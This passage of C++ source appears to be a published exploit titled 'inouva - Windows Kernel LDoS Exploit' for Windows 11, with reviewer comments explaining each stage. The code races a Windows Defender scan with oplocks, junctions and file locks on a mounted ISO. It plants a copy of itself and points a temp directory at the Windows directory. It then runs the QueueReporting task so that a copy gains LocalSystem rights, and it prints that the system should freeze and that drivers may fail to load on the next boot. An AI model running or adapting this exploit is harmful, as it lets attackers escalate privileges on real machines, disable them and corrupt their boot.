adjustment.Privileges[0].Attributes = bEnablePrivilege ? SE_PRIVILEGE_ENABLED : 0;

const BOOL adjusted = AdjustTokenPrivileges(hToken, FALSE, &adjustment, 0, (PTOKEN_PRIVILEGES)NULL, (PDWORD)NULL);
if (!adjusted) {
printf("[!] AdjustTokenPrivileges error: %u\n", GetLastError());
return FALSE;
}

// A TRUE return still has to be cross-checked: the call reports a missing privilege via last-error.
if (GetLastError() == ERROR_NOT_ALL_ASSIGNED) {
printf("[!] The token does not have the specified privilege.\n");
return FALSE;
}

return TRUE;
}

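// Report whether the current process token's user SID is the LocalSystem well-known SID.
// Returns true only when OpenProcessToken, the buffer allocation, GetTokenInformation and
// IsWellKnownSid(WinLocalSystemSid) all succeed; false on any failure. The token handle
// and the TOKEN_USER buffer are released on every path (the original leaked the buffer).
bool IsRunningAsLocalSystem() {
HANDLE htoken = NULL;
if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &htoken)) {
printf("[!] OpenProcessToken failed, error: %d\n", GetLastError());
return false;
}

// Fixed TOKEN_USER header plus room for the largest SID the query can return.
const DWORD bufsz = MAX_SID_SIZE + sizeof(TOKEN_USER);
TOKEN_USER* tokenuser = (TOKEN_USER*)malloc(bufsz);
if (!tokenuser) {
CloseHandle(htoken);
return false;
}

DWORD retsz = 0;
bool res = GetTokenInformation(htoken, TokenUser, tokenuser, bufsz, &retsz);
CloseHandle(htoken);

bool issystem = false;
if (res)
issystem = IsWellKnownSid(tokenuser->User.Sid, WinLocalSystemSid);

free(tokenuser);
return issystem;
}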

// Start C:\Windows\System32\conhost.exe in the given session using a copy of the
// current process token. Reached only from the LocalSystem branch of main().
// Steps: enable SeTcb/SeAssignPrimaryToken/SeImpersonate/SeDebug on the current token
// (SetPrivilege failures are ignored), duplicate it as a primary token at
// SecurityDelegation level, stamp `sessionid` on the copy, then CreateProcessAsUser.
// Nothing is returned; a failed CreateProcessAsUser is not reported (its return value is
// unchecked, and pi is zero-initialised so the handle closes below are safe either way).
// NOTE(review): NULL is passed for dwCreationFlags (a DWORD), i.e. 0.
void LaunchConsoleInSessionId(DWORD sessionid) {
HANDLE htoken = NULL;
if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &htoken))
return;

SetPrivilege(htoken, SE_TCB_NAME, TRUE);
SetPrivilege(htoken, SE_ASSIGNPRIMARYTOKEN_NAME, TRUE);
SetPrivilege(htoken, SE_IMPERSONATE_NAME, TRUE);
SetPrivilege(htoken, SE_DEBUG_NAME, TRUE);

HANDLE hnewtoken = NULL;
bool res = DuplicateTokenEx(htoken, TOKEN_ALL_ACCESS, NULL, SecurityDelegation, TokenPrimary, &hnewtoken);
CloseHandle(htoken);

if (!res)
return;

// Retarget the duplicated token at the caller-supplied session (the pipe server's session in main()).
res = SetTokenInformation(hnewtoken, TokenSessionId, &sessionid, sizeof(DWORD));
if (!res) {
CloseHandle(hnewtoken);
return;
}

STARTUPINFO si = { 0 };
si.cb = sizeof(si);
PROCESS_INFORMATION pi = { 0 };

CreateProcessAsUser(hnewtoken, L"C:\\Windows\\System32\\conhost.exe", NULL,
NULL, NULL, FALSE, NULL, NULL, NULL, &si, &pi);

CloseHandle(hnewtoken);

if (pi.hProcess)
CloseHandle(pi.hProcess);
if (pi.hThread)
CloseHandle(pi.hThread);

return;
}

// Background thread: after g_poseidonevent is signalled, keep refilling the global
// g_poseidonbuf (declared outside this excerpt) with random bytes until g_poseidonexit
// becomes true. Started from main() only on machines with more than 3 processors,
// together with one PoseidonThread writer per processor; presumably a load generator
// whose exact purpose is not stated in the file.
// NOTE(review): g_poseidonexit is a plain bool written by main() and read here with no
// synchronisation, and g_poseidonbuf is written here while PoseidonThread reads it - both
// are data races under the C++ memory model (std::atomic<bool> would express the flag's intent).
DWORD WINAPI PoseidonGeneratorThread(void*) {
SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_BELOW_NORMAL);
WaitForSingleObject(g_poseidonevent, INFINITE);

do {
// System-preferred RNG; the return status is ignored.
BCryptGenRandom(NULL, (PUCHAR)g_poseidonbuf, sizeof(g_poseidonbuf), BCRYPT_USE_SYSTEM_PREFERRED_RNG);
} while (!g_poseidonexit);

return ERROR_SUCCESS;
}

// Background writer thread: create a private, delete-on-close %TEMP%\RP_<uuid> file,
// wait for g_poseidonevent, then overwrite the file from offset 0 with g_poseidonbuf in
// a loop until g_poseidonexit is set. Returns GetLastError() if the file cannot be
// created, ERROR_SUCCESS otherwise. One instance per processor is started by main().
// NOTE(review): the try/catch(int) is dead code - WriteFile does not throw C++
// exceptions; `wuid` is never freed; g_poseidonexit/g_poseidonbuf are read without
// synchronisation (see PoseidonGeneratorThread).
DWORD WINAPI PoseidonThread(void*) {
GUID uid = { 0 };
RPC_WSTR wuid = { 0 };
UuidCreate(&uid);
UuidToStringW(&uid, &wuid);
wchar_t* wuid2 = (wchar_t*)wuid;

wchar_t target[MAX_PATH] = { 0 };
ExpandEnvironmentStrings(L"%TEMP%\\RP_", target, MAX_PATH);
wcscat(target, wuid2);

// Share mode NULL (0): no other opener is admitted; the file disappears when this handle closes.
HANDLE hfile = CreateFile(target, GENERIC_ALL, NULL, NULL, CREATE_NEW,
FILE_ATTRIBUTE_NORMAL | FILE_FLAG_DELETE_ON_CLOSE, NULL);
if (!hfile || hfile == INVALID_HANDLE_VALUE)
return GetLastError();

WaitForSingleObject(g_poseidonevent, INFINITE);

try {
do {
// Rewrite the same region each pass; write errors and short writes are not checked.
SetFilePointer(hfile, 0, NULL, FILE_BEGIN);
DWORD ret = 0;
WriteFile(hfile, g_poseidonbuf, sizeof(g_poseidonbuf), &ret, NULL);
} while (!g_poseidonexit);
} catch (int e) {
}

CloseHandle(hfile);
return ERROR_SUCCESS;
}
// Program entry point. Two modes, chosen by IsRunningAsLocalSystem():
//  * LocalSystem: connect to \\.\pipe\RoguePlanet, read the pipe server's session id and
//    hand off to LaunchConsoleInSessionId(); presumably the path taken by the copy of this
//    executable written in Stage 8 once the QueueReporting task (Stage 11) runs it.
//  * otherwise: the driver sequence printed as "Stage 1".."Stage 11" below (there is no Stage 10).
// Names used here but defined outside this excerpt: GetWERDir, WriteEicar, WDStartScan,
// ShadowCopyFinderThread, rawData, g_poseidonbuf, the _Nt* function pointers and custom_defs.
// Observable artefacts, all visible in this function: %TEMP%\RP_<uuid> files and directories,
// mount-point reparse points created on user-temp directories (targets: the mounted ISO's
// \Device\ name, a temp subdirectory, and finally the Windows directory), a named pipe
// \\.\pipe\RoguePlanet, an oplock request on a shadow-copy path, an on-demand run of the
// \Microsoft\Windows\Windows Error Reporting\QueueReporting task, and a process running as
// HIGH_PRIORITY_CLASS / THREAD_PRIORITY_TIME_CRITICAL.
// NOTE(review): nearly every handle and buffer is leaked on the early `return 1` paths;
// the NtCreateFile results for hvss and hc and both oplock/reparse DeviceIoControl calls are
// never checked; and `WriteFile(...) == ERROR_IO_PENDING` (here and in WriteEicar) can never be
// true because WriteFile returns a BOOL, so write failures are never detected.
int main() {
printf("============================================================\n");
printf(" inouva - Windows Kernel LDoS Exploit\n");
printf(" Windows 11 25H2 (Build 26200) and later\n");
printf("============================================================\n\n");

// Resolve the native API entry points used by the helpers (file-scope pointers set here).
ntdllhm = GetModuleHandle(L"ntdll.dll");
if (!ntdllhm) {
printf("[!] Failed to get ntdll.dll handle.\n");
return 1;
}

_NtSetInformationFile = (NTSTATUS(WINAPI*)(HANDLE, PIO_STATUS_BLOCK, PVOID, ULONG, FILE_INFORMATION_CLASS))
GetProcAddress(ntdllhm, "NtSetInformationFile");
_NtDeleteFile = (NTSTATUS(WINAPI*)(POBJECT_ATTRIBUTES))
GetProcAddress(ntdllhm, "NtDeleteFile");
_NtOpenDirectoryObject = (NTSTATUS(WINAPI*)(PHANDLE, ACCESS_MASK, POBJECT_ATTRIBUTES))
GetProcAddress(ntdllhm, "NtOpenDirectoryObject");
_NtQueryDirectoryObject = (NTSTATUS(WINAPI*)(HANDLE, PVOID, ULONG, BOOLEAN, BOOLEAN, PULONG, PULONG))
GetProcAddress(ntdllhm, "NtQueryDirectoryObject");
_NtQueryInformationFile = (NTSTATUS(WINAPI*)(HANDLE, PIO_STATUS_BLOCK, PVOID, ULONG, FILE_INFORMATION_CLASS))
GetProcAddress(ntdllhm, "NtQueryInformationFile");

if (!_NtSetInformationFile || !_NtDeleteFile || !_NtOpenDirectoryObject ||
!_NtQueryDirectoryObject || !_NtQueryInformationFile) {
printf("[!] Failed to import NT API functions.\n");
return 1;
}
// Auto-reset event that releases the Poseidon threads (signalled in Stage 4, never reset here).
g_poseidonevent = CreateEvent(NULL, FALSE, FALSE, NULL);
if (!g_poseidonevent) {
printf("[!] Failed to create event.\n");
return 1;
}
// LocalSystem mode: client side of the pipe created further down by the non-system instance.
if (IsRunningAsLocalSystem()) {
printf("[*] Running as Local System.\n");
HANDLE hclient = CreateFile(L"\\\\.\\pipe\\RoguePlanet", GENERIC_READ | GENERIC_WRITE,
FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE,
NULL, OPEN_EXISTING, NULL, NULL);
if (!hclient || hclient == INVALID_HANDLE_VALUE)
return 1;

DWORD sesid = 0;
bool sh = GetNamedPipeServerSessionId(hclient, &sesid);
CloseHandle(hclient);

if (sh) {
LaunchConsoleInSessionId(sesid);
}
return 0;
}
SYSTEM_INFO sysinfo = { 0 };
GetSystemInfo(&sysinfo);

// Background load threads only on machines with more than 3 processors: one generator plus
// one writer per processor. Thread handles are discarded and the threads are never joined.
// NOTE(review): `int i` is compared against a DWORD, and %d is used for a DWORD.
if (sysinfo.dwNumberOfProcessors > 3) {
DWORD tid = 0;
CreateThread(NULL, 0, PoseidonGeneratorThread, NULL, 0, &tid);

for (int i = 0; i < sysinfo.dwNumberOfProcessors; i++) {
DWORD tid0 = 0;
CreateThread(NULL, 0, PoseidonThread, NULL, 0, &tid0);
}
printf("[*] Started %d Poseidon threads.\n", sysinfo.dwNumberOfProcessors);
}
// Server side of the pipe the LocalSystem instance connects to; ConnectNamedPipe waits on it in Stage 11.
// NULL is passed for the buffer sizes, timeout and security attributes.
HANDLE hpipe = CreateNamedPipe(L"\\\\.\\pipe\\RoguePlanet", PIPE_ACCESS_DUPLEX,
PIPE_WAIT, PIPE_UNLIMITED_INSTANCES,
NULL, NULL, NULL, NULL);
if (!hpipe || hpipe == INVALID_HANDLE_VALUE) {
printf("[!] Failed to create communication pipe, error: %d\n", GetLastError());
return 1;
}
printf("[*] Stage 1: Mounting ISO...\n");
HANDLE hvirtdisk = NULL;
if (!MountISO(&hvirtdisk)) {
printf("[!] Failed to mount ISO.\n");
return 1;
}
printf("[+] ISO mounted successfully.\n");
// Directory handle on the Windows directory, used only as the ReadDirectoryChangesW source in Stage 6.
wchar_t windir2[MAX_PATH] = { 0 };
GetWindowsDirectory(windir2, MAX_PATH);

HANDLE hwin = CreateFile(windir2, GENERIC_READ,
FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE,
NULL, OPEN_EXISTING, FILE_FLAG_BACKUP_SEMANTICS, NULL);
if (!hwin || hwin == INVALID_HANDLE_VALUE) {
printf("[!] Failed to open %ws, error: %d\n", windir2, GetLastError());
return 1;
}
printf("[*] Stage 2: Creating working directory structure...\n");

// workdir = %TEMP%\RP_<uuid> (Win32 form); `wuid` is never freed.
wchar_t workdir[MAX_PATH] = { 0 };
GUID uid = { 0 };
RPC_WSTR wuid = { 0 };
UuidCreate(&uid);
UuidToStringW(&uid, &wuid);
wchar_t* wuid2 = (wchar_t*)wuid;
ExpandEnvironmentStrings(L"%TEMP%\\RP_", workdir, MAX_PATH);
wcscat(workdir, wuid2);

if (!CreateDirectory(workdir, NULL)) {
printf("[!] Failed to create work directory, error: %d\n", GetLastError());
return 1;
}
// Raise scheduling priority for the remainder of the run.
SetPriorityClass(GetCurrentProcess(), HIGH_PRIORITY_CLASS);
SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_TIME_CRITICAL);
// workdir\wdtest_temp, created through the native API in \??\ form with FILE_SHARE_READ only.
HANDLE hdirtmp = NULL;
wchar_t dirtmp[MAX_PATH] = { 0 };
wsprintf(dirtmp, L"\\??\\%s\\wdtest_temp", workdir);
UNICODE_STRING _dirtmp = { 0 };
RtlInitUnicodeString(&_dirtmp, dirtmp);
OBJECT_ATTRIBUTES dirtmpobjattr = { 0 };
InitializeObjectAttributes(&dirtmpobjattr, &_dirtmp, OBJ_CASE_INSENSITIVE, NULL, NULL);
IO_STATUS_BLOCK iostat = { 0 };

NTSTATUS dirstat = NtCreateFile(&hdirtmp, GENERIC_READ | GENERIC_WRITE | DELETE | SYNCHRONIZE,
&dirtmpobjattr, &iostat, NULL, NULL, FILE_SHARE_READ,
FILE_CREATE, FILE_DIRECTORY_FILE, NULL, NULL);
if (dirstat) {
printf("[!] Failed to create working directory: %ws, error: 0x%0.8X\n", dirtmp, dirstat);
return 1;
}

// GetWERDir (not in this excerpt) yields a path whose leaf name is reused as a subdirectory
// name under workdir; zippath (file-scope) becomes workdir\<leaf>\wermgr.exe.
wchar_t wddirname[MAX_PATH] = { 0 };
if (!GetWERDir(wddirname)) {
return 1;
}
wchar_t* verdirname = PathFindFileName(wddirname);
wsprintf(zippath, L"%s\\%s\\wermgr.exe", workdir, verdirname);

// hdir = workdir\<leaf>; this is the directory later turned into a junction (Stages 5, 7) and un-junctioned (Stage 7).
HANDLE hdir = NULL;
wchar_t maindirname[MAX_PATH] = { 0 };
wsprintf(maindirname, L"\\??\\%s\\%s", workdir, verdirname);
UNICODE_STRING _maindirname = { 0 };
RtlInitUnicodeString(&_maindirname, maindirname);
OBJECT_ATTRIBUTES maindirobjattr = { 0 };
InitializeObjectAttributes(&maindirobjattr, &_maindirname, OBJ_CASE_INSENSITIVE, NULL, NULL);
iostat = { 0 };

dirstat = NtCreateFile(&hdir, GENERIC_READ | FILE_WRITE_DATA | DELETE,
&maindirobjattr, &iostat, NULL, NULL, FILE_SHARE_READ,
FILE_CREATE, FILE_DIRECTORY_FILE, NULL, NULL);
if (dirstat) {
printf("[!] Failed to create working directory: %ws, error: 0x%0.8X\n", maindirname, dirstat);
return 1;
}
printf("[*] Stage 3: Writing EICAR test file...\n");

// Physical path of the attached ISO, reduced to "\Device\<leaf>" for use as an NT name.
wchar_t _mntpath[MAX_PATH] = { 0 };
ULONG pathsz = MAX_PATH;
DWORD retval = GetVirtualDiskPhysicalPath(hvirtdisk, &pathsz, _mntpath);
if (retval) {
printf("[!] Failed to fetch mounted disk path, error: %d\n", retval);
return 1;
}

wchar_t mntpath[MAX_PATH] = { L"\\Device\\" };
wcscat(mntpath, PathFindFileName(_mntpath));

// WriteEicar is defined above this excerpt; its tail copies an EICAR source file into a new file and adds a ":WDFOO" stream.
HANDLE heicar = WriteEicar(maindirname, mntpath);
if (!heicar)
return 1;
printf("[+] EICAR file written successfully.\n");
printf("[*] Stage 4: Triggering Windows Defender scan...\n");

// Release the Poseidon threads, then start the scan thread (WDStartScan is not in this excerpt).
SetEvent(g_poseidonevent);

DWORD tid = 0;
HANDLE hthread = CreateThread(NULL, 0, WDStartScan, NULL, 0, &tid);
if (!hthread) {
printf("[!] Failed to create working thread, error: %d\n", GetLastError());
return 1;
}
printf("[+] Windows Defender scan started.\n");
printf("[*] Stage 5: Triggering race condition...\n");

// delpath = maindirname\wermgr.exe, opened with DELETE access further down (hc).
wchar_t _delpath[MAX_PATH] = { 0 };
wsprintf(_delpath, L"%s\\wermgr.exe", maindirname);
UNICODE_STRING delpath = { 0 };
RtlInitUnicodeString(&delpath, _delpath);
OBJECT_ATTRIBUTES delobjattr = { 0 };
InitializeObjectAttributes(&delobjattr, &delpath, OBJ_CASE_INSENSITIVE, NULL, NULL);
IO_STATUS_BLOCK deliostat = { 0 };
HANDLE hc = NULL;

// Despite its name, ShadowCopyFinderThread (not in this excerpt) is called synchronously here
// and is expected to fill vsspath; its result is not checked.
wchar_t vsspath[MAX_PATH] = { 0 };
ShadowCopyFinderThread(vsspath);
printf("[*] VSS path: %ws\n", vsspath);

// Same file as heicar, addressed through the shadow-copy path: <vss>\<workdir without its
// 3-char "X:\" prefix>\<leaf>\wermgr.exe:WDFOO. The open status `stat` is not checked.
CloseHandle(heicar);
HANDLE hvss = NULL;
wchar_t vsswinpath[MAX_PATH] = { 0 };
wsprintf(vsswinpath, L"%s\\%s\\%s\\wermgr.exe:WDFOO", vsspath, &workdir[3], verdirname);
UNICODE_STRING _vsswinpath = { 0 };
RtlInitUnicodeString(&_vsswinpath, vsswinpath);
OBJECT_ATTRIBUTES objattr2 = { 0 };
InitializeObjectAttributes(&objattr2, &_vsswinpath, OBJ_CASE_INSENSITIVE, NULL, NULL);
iostat = { 0 };

NTSTATUS stat = NtCreateFile(&hvss, GENERIC_READ | SYNCHRONIZE, &objattr2, &iostat,
NULL, NULL, NULL, FILE_OPEN, NULL, NULL, NULL);

// Request a read+handle caching oplock on the shadow-copy handle, wait for the request to
// complete, then close the handle straight away. The DeviceIoControl result is not checked and
// ovoplock.hEvent is never closed.
REQUEST_OPLOCK_INPUT_BUFFER opin = { 0 };
opin.StructureLength = sizeof(opin);
opin.StructureVersion = REQUEST_OPLOCK_CURRENT_VERSION;
opin.RequestedOplockLevel = OPLOCK_LEVEL_CACHE_READ | OPLOCK_LEVEL_CACHE_HANDLE;
opin.Flags = REQUEST_OPLOCK_INPUT_FLAG_REQUEST;
REQUEST_OPLOCK_OUTPUT_BUFFER opout = { 0 };
opout.StructureLength = sizeof(opout);
opout.StructureVersion = REQUEST_OPLOCK_CURRENT_VERSION;
DWORD cb = 0;
OVERLAPPED ovoplock = { 0 };
ovoplock.hEvent = CreateEvent(NULL, FALSE, FALSE, NULL);

DeviceIoControl(hvss, FSCTL_REQUEST_OPLOCK, &opin, sizeof(opin),
&opout, sizeof(opout), &cb, &ovoplock);
WaitForSingleObject(ovoplock.hEvent, INFINITE);
CloseHandle(hvss);
// Supersede maindirname\wermgr.exe with DELETE access (status unchecked), rename it away to a
// fresh %TEMP%\RP_<uuid>, then make the <leaf> directory a junction onto the mounted ISO device.
NTSTATUS delstat = NtCreateFile(&hc, DELETE, &delobjattr, &deliostat, NULL, NULL,
FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE,
FILE_SUPERSEDE, NULL, NULL, NULL);
MoveToTempDir(hc);
if (!CreateJunction(hdir, mntpath))
return 1;

if (hc)
CloseHandle(hc);

printf("[*] Stage 6: Monitoring for directory changes...\n");

// Block (synchronous ReadDirectoryChangesW, recursive) until the Windows directory reports a
// file-name change whose relative name is exactly 24 wide chars and starts with "Temp\TMP"
// (case-insensitive). Only the first record in the buffer is inspected; NextEntryOffset is ignored.
char buff[0x1000] = { 0 };
wchar_t teststr[] = { L"Temp\\TMP" };

do {
ZeroMemory(buff, sizeof(buff));
DWORD retbytes = 0;
ReadDirectoryChangesW(hwin, buff, sizeof(buff), TRUE,
FILE_NOTIFY_CHANGE_FILE_NAME, &retbytes, NULL, NULL);
PFILE_NOTIFY_INFORMATION pfni = (PFILE_NOTIFY_INFORMATION)buff;
if (pfni->FileNameLength / 2 != 24 || _wcsnicmp(&pfni->FileName[0], teststr, 8) != 0)
continue;
break;
} while (1);
printf("[*] Stage 7: Finalizing exploit...\n");

// workdir2 = \??\<workdir>, used in Stage 9 to reopen the work directory.
wchar_t workdir2[MAX_PATH] = { L"\\??\\" };
wcscat(workdir2, workdir);

// Re-point the <leaf> junction from the ISO device to workdir\wdtest_temp.
if (!CreateJunction(hdir, dirtmp)) {
return 1;
}
// lockpath = \Device\<iso>\wermgr.exe, i.e. the file on the read-only ISO itself.
wchar_t lockpath[MAX_PATH] = { 0 };
wsprintf(lockpath, L"%s\\wermgr.exe", mntpath);
HANDLE hlock1 = NULL;
UNICODE_STRING _lockpath = { 0 };
RtlInitUnicodeString(&_lockpath, lockpath);
OBJECT_ATTRIBUTES lockpathobjattr = { 0 };
InitializeObjectAttributes(&lockpathobjattr, &_lockpath, OBJ_CASE_INSENSITIVE, NULL, NULL);
iostat = { 0 };

// Second EICAR write; a NULL return would be passed to CloseHandle unchecked.
CloseHandle(WriteEicar(maindirname, mntpath));

stat = NtCreateFile(&hlock1, GENERIC_READ, &lockpathobjattr, &iostat, NULL, FILE_ATTRIBUTE_NORMAL,
FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE, FILE_OPEN, NULL, NULL, NULL);
if (stat) {
printf("[!] Failed to open file: %ws, error: 0x%0.8X\n", lockpath, stat);
return 1;
}

// Byte-range lock over the whole file (offset 0, length MAXDWORD:MAXDWORD); hlock1 is never closed or unlocked.
if (!LockFile(hlock1, NULL, NULL, MAXDWORD, MAXDWORD)) {
printf("[!] Failed to lock file, error: %d\n", GetLastError());
return 1;
}
// eicarpath = maindirname\wermgr.exe, resolved through whatever the <leaf> junction points at now.
HANDLE heicar2 = NULL;
wchar_t eicarpath[MAX_PATH] = { 0 };
wsprintf(eicarpath, L"%s\\wermgr.exe", maindirname);
UNICODE_STRING _eicarpath = { 0 };
RtlInitUnicodeString(&_eicarpath, eicarpath);
OBJECT_ATTRIBUTES eicarpathobjattr = { 0 };
InitializeObjectAttributes(&eicarpathobjattr, &_eicarpath, OBJ_CASE_INSENSITIVE, NULL, NULL);
iostat = { 0 };

stat = NtCreateFile(&heicar2, GENERIC_READ, &eicarpathobjattr, &iostat, NULL, FILE_ATTRIBUTE_NORMAL,
FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE, FILE_OPEN, NULL, NULL, NULL);
if (stat) {
printf("[!] Failed to open file: %ws, error: 0x%0.8X\n", eicarpath, stat);
return 1;
}

// newfpath = maindirname\<name of the first size-change notification under wdtest_temp>.
// The loop body always breaks after one notification; the name is appended without bounds checking.
wchar_t newfpath[MAX_PATH] = { 0 };
wcscpy(newfpath, maindirname);
wcscat(newfpath, L"\\");

do {
ZeroMemory(buff, sizeof(buff));
DWORD retbytes = 0;
ReadDirectoryChangesW(hdirtmp, buff, sizeof(buff), TRUE,
FILE_NOTIFY_CHANGE_SIZE, &retbytes, NULL, NULL);
PFILE_NOTIFY_INFORMATION pfni = (PFILE_NOTIFY_INFORMATION)buff;
wcscat(newfpath, &pfni->FileName[0]);
break;
} while (1);
if (!LockFile(heicar2, NULL, NULL, MAXDWORD, MAXDWORD)) {
printf("[!] Failed to lock EICAR file, error: %d\n", GetLastError());
return 1;
}
CloseHandle(hwin);

// Remove the junction from the <leaf> directory (header-only REPARSE_GUID_DATA_BUFFER with the
// mount-point tag). The event is closed immediately without waiting, and the result is unchecked.
REPARSE_GUID_DATA_BUFFER rp_buffer = { 0 };
rp_buffer.ReparseTag = IO_REPARSE_TAG_MOUNT_POINT;
DWORD cb2 = 0;
OVERLAPPED ov = { 0 };
HANDLE hevent = CreateEvent(NULL, FALSE, FALSE, NULL);
ov.hEvent = hevent;

DeviceIoControl(hdir, FSCTL_DELETE_REPARSE_POINT, &rp_buffer, REPARSE_GUID_DATA_BUFFER_HEADER_SIZE,
nullptr, 0, &cb2, &ov);
CloseHandle(ov.hEvent);

printf("[*] Stage 8: Writing payload...\n");

// Overwrite-or-create newfpath, then copy this executable's own image into it.
HANDLE htempfile = NULL;
UNICODE_STRING _newfpath = { 0 };
RtlInitUnicodeString(&_newfpath, newfpath);
OBJECT_ATTRIBUTES newfpathobjattr = { 0 };
InitializeObjectAttributes(&newfpathobjattr, &_newfpath, OBJ_CASE_INSENSITIVE, NULL, NULL);
iostat = { 0 };

stat = NtCreateFile(&htempfile, GENERIC_READ | GENERIC_WRITE | DELETE, &newfpathobjattr, &iostat,
NULL, FILE_ATTRIBUTE_NORMAL, FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE,
FILE_OVERWRITE_IF, NULL, NULL, NULL);
if (stat) {
printf("[!] Failed to open file: %ws, error: 0x%0.8X\n", newfpath, stat);
return 1;
}

HMODULE module = GetModuleHandle(NULL);
wchar_t mx[MAX_PATH] = { 0 };
GetModuleFileName(module, mx, MAX_PATH);

HANDLE hself = CreateFile(mx, GENERIC_READ, FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE,
NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
if (!hself || hself == INVALID_HANDLE_VALUE) {
printf("[!] Failed to open current executable, error: %d\n", GetLastError());
return 1;
}

// Whole-file read in one call; li.QuadPart is narrowed to DWORD at the call sites and malloc is not NULL-checked.
DWORD readbytes = 0;
LARGE_INTEGER li = { 0 };
GetFileSizeEx(hself, &li);
void* exebuff = malloc(li.QuadPart);

if (!ReadFile(hself, exebuff, li.QuadPart, &readbytes, NULL)) {
printf("[!] Failed to read current executable binary, error: %d\n", GetLastError());
return 1;
}
CloseHandle(hself);

// Overlapped write; the `== ERROR_IO_PENDING` comparison on a BOOL can never be true (see header note).
readbytes = 0;
OVERLAPPED ovp = { 0 };
ovp.hEvent = CreateEvent(NULL, FALSE, FALSE, NULL);

if (WriteFile(htempfile, exebuff, li.QuadPart, &readbytes, &ovp) == ERROR_IO_PENDING) {
printf("[!] Failed to write payload file, error: %d\n", GetLastError());
return 1;
}
WaitForSingleObject(ovp.hEvent, INFINITE);
CloseHandle(ovp.hEvent);
free(exebuff);

printf("[*] Stage 9: Finalizing and detaching...\n");
// Rename the payload file, wdtest_temp and the <leaf> directory each to a fresh %TEMP%\RP_<uuid>
// (MoveToTempDir return values ignored), leaving the work directory empty.
CloseHandle(heicar2);
MoveToTempDir(htempfile);
MoveToTempDir(hdirtmp);
MoveToTempDir(hdir);
// Reopen the (now empty) work directory with FILE_WRITE_ATTRIBUTES and turn it into a junction
// onto the Windows directory.
HANDLE hparent = NULL;
UNICODE_STRING _workdir = { 0 };
RtlInitUnicodeString(&_workdir, workdir2);
OBJECT_ATTRIBUTES workdirobjattr = { 0 };
InitializeObjectAttributes(&workdirobjattr, &_workdir, OBJ_CASE_INSENSITIVE, NULL, NULL);
iostat = { 0 };

stat = NtCreateFile(&hparent, FILE_WRITE_ATTRIBUTES, &workdirobjattr, &iostat, NULL, NULL,
FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE, FILE_OPEN,
FILE_DIRECTORY_FILE, NULL, NULL);
if (stat) {
printf("[!] Failed to open file: %ws, error: 0x%0.8X\n", workdir2, stat);
return 1;
}
wchar_t __tmp[MAX_PATH] = { 0 };
GetWindowsDirectory(__tmp, MAX_PATH);
wchar_t dest[MAX_PATH] = { L"\\??\\" };
wcscat(dest, __tmp);

if (!CreateJunction(hparent, dest)) {
return 1;
}
CloseHandle(hparent);
CloseHandle(hdirtmp);
CloseHandle(hdir);
// Detach and release the ISO, wait for the scan thread, then signal the Poseidon threads to
// stop. They are never joined; Sleep(500) is the only grace period before the COM work below.
DetachVirtualDisk(hvirtdisk, DETACH_VIRTUAL_DISK_FLAG_NONE, NULL);
CloseHandle(hvirtdisk);
WaitForSingleObject(hthread, INFINITE);
CloseHandle(hthread);
CloseHandle(htempfile);
g_poseidonexit = true;
Sleep(500);
printf("[*] Stage 11: Triggering persistence...\n");

// Task Scheduler via COM: run the built-in \Microsoft\Windows\Windows Error Reporting\QueueReporting
// task on demand. `if (hr)` treats every non-zero HRESULT (including success codes such as S_FALSE)
// as failure, and the interfaces obtained so far are not released on those paths.
HRESULT hr = S_OK;
ITaskService* pTaskSvc = NULL;
hr = CoInitialize(NULL);
if (SUCCEEDED(hr)) {
hr = CoCreateInstance(CLSID_TaskScheduler, NULL, CLSCTX_INPROC_SERVER,
IID_ITaskService, (void**)&pTaskSvc);
if (FAILED(hr)) {
printf("[!] Failed to initialize task scheduler COM server.\n");
CoUninitialize();
return 1;
}
} else {
return 1;
}
hr = pTaskSvc->Connect(_variant_t(), _variant_t(), _variant_t(), _variant_t());
if (hr) {
printf("[!] Failed to connect to task scheduler service, error: 0x%0.8X\n", hr);
return 1;
}
ITaskFolder* taskfolder = NULL;
hr = pTaskSvc->GetFolder((BSTR)L"\\Microsoft\\Windows\\Windows Error Reporting", &taskfolder);
if (hr) {
printf("[!] Failed to get task scheduler folder, error: 0x%0.8X\n", hr);
return 1;
}
IRegisteredTask* taskex = NULL;
hr = taskfolder->GetTask((BSTR)L"QueueReporting", &taskex);
if (hr) {
printf("[!] Failed to obtain task object, error: 0x%0.8X\n", hr);
return 1;
}
IRunningTask* runningtask = NULL;
hr = taskex->Run(_variant_t(), &runningtask);
if (hr) {
printf("[!] Failed to run scheduled task, error: 0x%0.8X\n", hr);
return 1;
}
// Block until a client connects to \\.\pipe\RoguePlanet (the LocalSystem branch at the top of main()).
if (!ConnectNamedPipe(hpipe, NULL)) {
printf("[!] ConnectNamedPipe failed, error: %d\n", GetLastError());
return 1;
}
printf("\n============================================================\n");
printf(" [!!] EXPLOIT SUCCESSFUL\n");
printf(" System should now be in a frozen/deadlocked state.\n");
printf(" Some drivers may fail to load on next boot.\n");
printf("============================================================\n\n");
runningtask->Release();
taskex->Release();
taskfolder->Release();
pTaskSvc->Release();
CoUninitialize();
return 0;
}



Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================
